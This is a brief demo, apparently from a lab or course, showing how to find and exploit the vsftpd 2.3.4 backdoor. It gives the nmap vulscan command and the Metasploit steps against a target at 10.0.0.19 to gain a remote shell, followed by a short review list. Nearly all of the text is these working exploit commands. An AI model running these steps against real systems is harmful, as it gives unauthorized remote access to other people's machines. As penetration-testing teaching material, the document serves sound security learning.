FTP Exploit Demo
Use Nmap to find the vulnerability.
nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV -p 21 10.0.0.19
Use metasploit-framework to run the exploit.
cd /usr/share/metasploit-framework/
cd modules/exploits/unix/ftp
msfconsole
use exploits/unix/ftp/vsftpd_234_backdoor
set RHOST 10.0.0.19
run
We can run the shell commands now.
QUICK REVIEW
- FTP exploits can open a backdoor to a victim's computer
- FTP itself can be vulnerable
- In this example, FTP opened a backdoor to the victim computer